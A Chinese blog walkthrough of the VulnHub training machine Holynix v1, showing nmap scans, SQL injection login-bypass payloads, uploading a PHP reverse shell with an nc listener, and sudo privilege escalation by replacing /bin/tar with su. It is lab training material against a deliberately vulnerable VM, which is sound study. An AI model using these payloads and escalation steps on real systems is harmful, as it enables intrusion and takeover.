Holynix: v1复现

于 2024-09-14 14:58:52 发布
阅读量319 收藏 10
点赞数 3
分类专栏: vulnhub靶场练习 文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61982677/article/details/142258643
版权

一、环境搭建

Holynix: v1 ~ VulnHub

更改网络模式为 NAT 模式

修改

靶机:192.168.198.177

攻击机(kali):192.168.198.129

二、信息扫描

主机扫描

nmap -sP 192.168.198.0/24 -T4

端口扫描

nmap -sV -p- 192.168.198.177

开放了一个 80 端口,访问一下

漏洞探测

只有一个 Home 和 Login 界面

尝试 SQL 注入

输入 admin'/admin' 直接报错,暴露 SQL 查询语句,表名为 accounts,username字段有单引号转义,用户名输入 admin,密码输入' or 1=1# ,直接登录

登录发现有一个文件上传界面

上传一个文件发现失败,禁用alamo用户主目录上传

查看 Security 界面发现可以显示文件

查看网页源代码,发现可以直接显示/etc/passwd 信息

发现另外的/bin/bash 权限用户

尝试构造 payload 登入etenenbaum 用户

' or username='etenenbaum' #

成功登入,再次尝试文件上传

上传成功

反弹shell

使用 kali 自带 Webshell

locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .

修改 ip 端口

上传木马文件,访问etenenbaum 用户家目录

http://192.168.198.177/~etenenbaum/

开启监听

nc -lvnp 8888

执行发现报错权限拒绝

修改文件后缀再次上传

tar czf shell.tar.gz php-reverse-shell.php

发现自动解压,点击执行,成功反弹到 shell

提权

建立交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看当前用户可以使用的权限

sudo -l

sudo 提权

sudo mv /bin/tar /bin/tar.orgi
sudo mv /bin/su /bin/tar
sudo tar

提权成功!

LYxianyu
关注
专栏目录
Atlas:undefined reference to `std::experimental::filesystem::v1::__cxx11::path::_M_split_cmpts()
mazhanIMP的博客
12-13 6070
Atlas开发中添加文件检测有无
Kubernetes--Pod管理与配置apiVersion: v1kind: ConfigMapmetadata: name: cm-appvarsdata: apploglevel:
GaoChuang_的博客
11-07 1997
一、Pod的配置管理 应用部署的最佳实践就是将应用所需的配置信息与程序分离,这样应用程序可以更好的被复用,通过不同配置可以实现更好的功能。将应用程序打包成容器镜像后,可以通过环境变量或者外挂文件的方式在创建容器时进行配置注入,但在大规模容器环境中,对多个容器进行不同配置将变得非常复杂,K8S在1.2版本提供了一种统一配置管理方案---ConfigMap。 1.ConfigMap概述 ConfigMap供容器使用的典型用法: (1) 生成容器内的环境变量 ...
HOLYNIX: V1靶机
weixin_71232352的博客
07-12 301
【代码】HOLYNIX: V1靶机。
HOLYNIX: V1
Mysmycbx的博客
03-18 331
holynix
HOLYNIX: V1靶机 带提权
weixin_71232352的博客
07-30 307
使用Python提高交互性,然后切换用户。输入id查看权限发现脏牛提权成功。uname -a查看内核版本。切换到临时目录并远程下载。最后根据提示恢复备份文件。
Vulnhub靶机:Holynix: v1
whoami
09-13 739
Vulnhub靶机:Holynix: v1实战
Vulnhub靶机:HOLYNIX_ V1
LainWith的博客
12-23 2338
Holynix(此系列共2台)发布日期:2010年11月27日难度:中运行环境:VMware Workstation目标:取得 root 权限补充:需要手工设置靶机的MAC为00:0c:29:bc:05:de,然后重启靶机才能获取到靶机IP主机发现端口扫描+漏洞扫描万能密码文件包含漏洞mv提权。
APK 签名:v1 v2 v3 v4
热门推荐
weixin_46569059的博客
09-15 1万+
通过对 Apk 进行签名,开发者可以证明对 Apk 的所有权和控制权,可用于安装和更新其应用。而在 Android 设备上的安装 Apk ,如果是一个没有被签名的 Apk,则会被拒绝安装。 在安装 Apk 的时候,软件包管理器也会验证 Apk 是否已经被正确签名,并且通过签名证书和数据摘要验证是否合法没有被篡改。只有确认安全无篡改的情况下,才允许安装在设备上。 简单来说,APK 的签名主要作用有两个: 证明 APK 的所有者。 允许 Android 市场和设备校验 APK 的正确性。
【k8s】kubernetes编写自己的operator(operator-sdk:v1.xxx)
翻过一座座山
09-09 2808
关于operator-sdk怎么安装,请参考官方文档:https://sdk.operatorframework.io/docs/installation/install-operator-sdk/ 1. 创建operator新项目 1)初始化项目,注意,一定要初始化go mod,否则operator-sdk无法识别项目依赖,且以下命令均在空文件夹hello-world-operator下执行: 2)创建api和控制器,创建HelloWorldManager的自定义资源类型: 以上命令执行成功后,可观察
目标检测 pytorch复现Yolo v1目标检测项目
05-17
本项目主要关注的是使用PyTorch框架复现经典的Yolo v1(You Only Look Once version 1)目标检测算法。Yolo v1是由Joseph Redmon等人在2015年提出的一种实时目标检测系统,其核心思想是将目标检测任务转化为一个回归...
第三方软件测评机构简析:软件安全性测试的方法和流程
卓码测评
09-12 587
随着信息技术的迅猛发展,软件在各行各业的应用日益普遍,软件安全性问题也愈加凸显。近几年来,频发的数据泄露、网络攻击事件,给企业和个人带来了不可估量的损失。这使得软件安全性测试成为软件开发过程中不可或缺的重要环节。
基于大模型技术的算力产业监测服务平台设计
09-17
内容概要:本文提出了一种新型算力产业监测服务平台的设计理念,运用国内自主研发的大模型技术支持,通过对传统技术的改进和完善,提出了三层架构的设计方法,即基础设施层(含向量数据库和模型训练)、大模型应用框架层(强化数据处理与多维关系挖掘)及业务层(如智能分析助手)。这种设计方案旨在提高算力产业发展监测与决策制定的质量。 适合人群:电信行业的从业人员及研究人员;算力产业链各环节管理者;政府相关机构和政策决策者。 使用场景及目标:在多种算力相关的应用场景(如云计算中心管理,数据中心监测,政策分析)中辅助决策者进行快速有效的信息获取和技术选择;助力算力产业发展方向的精确把控和战略调整。 其他说明:随着大模型技术的日臻成熟,该算力产业监测服务平台预计将进一步丰富自身的应用领域和服务深度,以促进算力行业更智慧化发展。
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot.zip
最新发布
09-17
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot
吉他谱_What I've Done - Linkin Park.pdf
09-17
初级入门吉他谱 guitar tab
吉他谱_Too sweet - Hozier.pdf
09-17
初级入门吉他谱 guitar tab
Linux使用的一些笔记,包括shell命令,软件,一些实用的网站的整理_Linux_note.zip
09-17
Linux使用的一些笔记,包括shell命令,软件,一些实用的网站的整理_Linux_note
基于ssm的机房预约系统设计与实现.docx
09-17
基于ssm的机房预约系统设计与实现.docx
app执行Linux命令_app-Linux-.zip
09-17
app执行Linux命令_app-Linux-
吉他谱_Would - Alice in Chains.pdf
09-17
初级入门吉他谱 guitar tab
docker build -t yolov8:v1 .
07-09
`docker build`命令用于从Dockerfile构建一个新的镜像。在这个命令中,`-t`选项用于指定新创建的镜像的名称和标签(这里是`yolov8:v1`),`.`表示当前目录作为Dockerfile的位置。 具体来说,当你运行`docker build -t yolov8:v1 .`时,Docker会执行以下步骤[^4]: 1. **查找Dockerfile**:它会在当前目录(`.`)下寻找名为`Dockerfile`的文件,这是定义镜像构建过程的基础。 2. **读取Dockerfile**:这个文本文件包含了指令序列,指示如何安装依赖项、配置环境、复制文件等来创建最终的镜像。 3. **构建镜像**:按照Dockerfile中的指令逐条执行,最后生成一个新的Docker镜像,其基础镜像是`yolov8`,标签为`v1`。 4. **命名并注册镜像**:如果成功构建完成,新的镜像就会以指定的名称和标签的形式存在本地仓库中,可以使用`docker images`命令查看。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值